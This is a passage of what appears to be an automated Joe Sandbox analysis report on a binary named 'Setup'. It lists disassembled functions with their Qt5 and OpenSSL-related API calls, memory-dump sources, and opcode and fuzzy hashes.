                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_PUBKEY$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-3400734455
                                                                                                                                                              • Opcode ID: 99fd1f3d112bf0b6ff4e2a808907ab0cf3820a6fa47d2b6b29040bf2a69107b8
                                                                                                                                                              • Instruction ID: 03d967ed1e2eebfbe41f517281f9ca9200452d55a72b04874277cd9f9586081f
                                                                                                                                                              • Opcode Fuzzy Hash: 99fd1f3d112bf0b6ff4e2a808907ab0cf3820a6fa47d2b6b29040bf2a69107b8
                                                                                                                                                              • Instruction Fuzzy Hash: E0F0B495F1EA8281EBC39B71E8112A53392BF84B10B409037DD6D4B361FE2CD1458E00
                                                                                                                                                              Function 00007FFBA1A334B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FDC), ref: 00007FFBA1A334C8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FDC), ref: 00007FFBA1A334ED
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA1A40FDC), ref: 00007FFBA1A33504
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: PEM_write_bio_ECPrivateKey$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-828354778
                                                                                                                                                              • Opcode ID: e180099cbf8f8b395083c48bbb5ffe2e013a4da52a824760f06f0aba45e92483
                                                                                                                                                              • Instruction ID: 624072aa8465bd4a668bbd8886e196eb14ec9c621227bfd73eb404e5cdc9c581
                                                                                                                                                              • Opcode Fuzzy Hash: e180099cbf8f8b395083c48bbb5ffe2e013a4da52a824760f06f0aba45e92483
                                                                                                                                                              • Instruction Fuzzy Hash: 88F0B495F0EA5281EFD29B71E8126A52391BF84710F808133DE6D4B261EE3CD545CE00
                                                                                                                                                              Function 00007FFBA1A35890 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4594D), ref: 00007FFBA1A358A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4594D), ref: 00007FFBA1A358CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A4594D), ref: 00007FFBA1A358E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$TLS_client_method
                                                                                                                                                              • API String ID: 646154281-2205130993
                                                                                                                                                              • Opcode ID: 3b15a26bebc38f4d3ec0ac040e29892e1e6426b8feaa31f8acbb6503fc0ab0c1
                                                                                                                                                              • Instruction ID: ea2929dda6c9c0abc13db2fbbc8040bed94c2b92d3ae9d087229b7c066234a34
                                                                                                                                                              • Opcode Fuzzy Hash: 3b15a26bebc38f4d3ec0ac040e29892e1e6426b8feaa31f8acbb6503fc0ab0c1
                                                                                                                                                              • Instruction Fuzzy Hash: 40F0B495F1EB8281EBC39B75EC152A53392BF84B10B408037DD6D4B321FE2CD4458E00
                                                                                                                                                              Function 00007FFBA1A32090 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320CD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320E4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: EVP_des_ede3_cbc$QSslSocket: cannot call unresolved function %s
                                                                                                                                                              • API String ID: 646154281-1268385618
                                                                                                                                                              • Opcode ID: 0ef44486c8c8c6ed7a4009c3dec80155a927a24c0719a7a3a72c0a1356a7c695
                                                                                                                                                              • Instruction ID: 8c3fafeb6c5755ad4c2b976c129e358e408b928c227376aa86d6724c45abd69a
                                                                                                                                                              • Opcode Fuzzy Hash: 0ef44486c8c8c6ed7a4009c3dec80155a927a24c0719a7a3a72c0a1356a7c695
                                                                                                                                                              • Instruction Fuzzy Hash: 25F09095F0EB8281EBC39B71E8116A57392AF85B20B408037DD6D4A321FE2CD48A8E00
                                                                                                                                                              Function 00007FFBA1A34080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A34098
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                                • Part of subcall function 00007FFBA1A1E9F0: _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A340BD
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A45955), ref: 00007FFBA1A340D4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Logger@@LoggingMessage$?warning@Enabled@H00@Init_thread_footerWarning
                                                                                                                                                              • String ID: QSslSocket: cannot call unresolved function %s$SSL_CTX_new
                                                                                                                                                              • API String ID: 646154281-2511137033
                                                                                                                                                              • Opcode ID: cd9ac0bae6f7690beffea8c0fc8595e1ff62e0b437573809fdccb546b680c606
                                                                                                                                                              • Instruction ID: 662676387e9242613257782cf18b8556a29b21be7bea3b7749b777d768c36c00
                                                                                                                                                              • Opcode Fuzzy Hash: cd9ac0bae6f7690beffea8c0fc8595e1ff62e0b437573809fdccb546b680c606
                                                                                                                                                              • Instruction Fuzzy Hash: FAF0B495F0EB8281EBC39B75E8016B57392AF85B10B408037DD6D4B721FE2CD0598E00
                                                                                                                                                              Function 00007FFBA19F5000 Relevance: 7.7, APIs: 5, Instructions: 152COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997F8C
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997F9A
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FA6
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FB2
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: memmove.VCRUNTIME140(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1997FD7
                                                                                                                                                                • Part of subcall function 00007FFBA1997F60: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19F5030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA1998002
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5033
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5047
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F528E
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F4681
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F468F
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F469B
                                                                                                                                                                • Part of subcall function 00007FFBA19F4650: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F46A7
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5082
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19F4181), ref: 00007FFBA19F5096
                                                                                                                                                                • Part of subcall function 00007FFBA19EC670: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A3EE56), ref: 00007FFBA19EC69B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?end@$?detach@?dispose@Data@1@Data@1@@$String@@memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 303060116-0
                                                                                                                                                              • Opcode ID: ff3707e131fae7d9a3d3276ebaf0420d30be135d43db068b343d63ca0d43564d
                                                                                                                                                              • Instruction ID: 750b480554c108b9ca812024de8797d2a4d32c8c69915226397ad65a3ac550ea
                                                                                                                                                              • Opcode Fuzzy Hash: ff3707e131fae7d9a3d3276ebaf0420d30be135d43db068b343d63ca0d43564d
                                                                                                                                                              • Instruction Fuzzy Hash: 0261B666A0AB4291EBA1DB31E5402BE6361FF85BD8F405531DE9E43799DE3CE409CF00
                                                                                                                                                              Function 00007FFBA19E1010 Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2580228974-0
                                                                                                                                                              • Opcode ID: 1dfe1a16d2e2e47a1e33b12028f82683141502b67750ae19379205a90f3f332e
                                                                                                                                                              • Instruction ID: b4e05c3a17397890ae460366719473aed270a740320a2fb5d05d4c4694c7cc64
                                                                                                                                                              • Opcode Fuzzy Hash: 1dfe1a16d2e2e47a1e33b12028f82683141502b67750ae19379205a90f3f332e
                                                                                                                                                              • Instruction Fuzzy Hash: B641C3A2B0AB8195EF55DB22E9042A9A755BB04BE4F444732DE7D0B7C5DF7CE042CB04
                                                                                                                                                              Function 00007FFBA19C8940 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19C898A,?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49BE
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??0QMutex@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49C8
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49E1
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B11
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B1A
                                                                                                                                                                • Part of subcall function 00007FFBA19C49B0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B35
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8998
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C89F8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A26
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A30
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C8A5F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$V0@@$Url@@$?dispose@BasicData@1@@Data@@ListMutex@@String@@Timer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3491540594-0
                                                                                                                                                              • Opcode ID: f9a24ce1c1991642a1f84d23c0aeaf99847dc7a908b3a727a23653a1d696b2f9
                                                                                                                                                              • Instruction ID: 492966fe6d8cec1f096b2063373a35db257266f5f5c58b690a2325e3f025726c
                                                                                                                                                              • Opcode Fuzzy Hash: f9a24ce1c1991642a1f84d23c0aeaf99847dc7a908b3a727a23653a1d696b2f9
                                                                                                                                                              • Instruction Fuzzy Hash: EB418E7260A6918BD792CF39E49006D37B0F759B58B085036DF9E43795DE3CE585CB40
                                                                                                                                                              Function 00007FFBA1984B70 Relevance: 7.6, APIs: 5, Instructions: 89timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984BA3
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C2A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C34
                                                                                                                                                              • ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C4B
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1984C8E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@$BasicMutex@@Timer@@Url@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1580018181-0
                                                                                                                                                              • Opcode ID: c0fd210d5eba2ed3c757df3b254f14c8090e210a5cd92ddc8e107506c25b3c98
                                                                                                                                                              • Instruction ID: bd4ff5be209031d0709cfb160f60848de35a84d66673848e4f61f6dadcd5476c
                                                                                                                                                              • Opcode Fuzzy Hash: c0fd210d5eba2ed3c757df3b254f14c8090e210a5cd92ddc8e107506c25b3c98
                                                                                                                                                              • Instruction Fuzzy Hash: B6414DB2A06B0697DB95DB36E49026D73B0FB44B94F404036DB9E83B51EF38E465CB40
                                                                                                                                                              Function 00007FFBA19F8870 Relevance: 7.6, APIs: 5, Instructions: 84timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88A7
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88D1
                                                                                                                                                              • ??8@YA_NAEBVQString@@0@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F88EF
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F8917
                                                                                                                                                              • ??8QDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,?,00007FFBA1973D09), ref: 00007FFBA19F8931
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
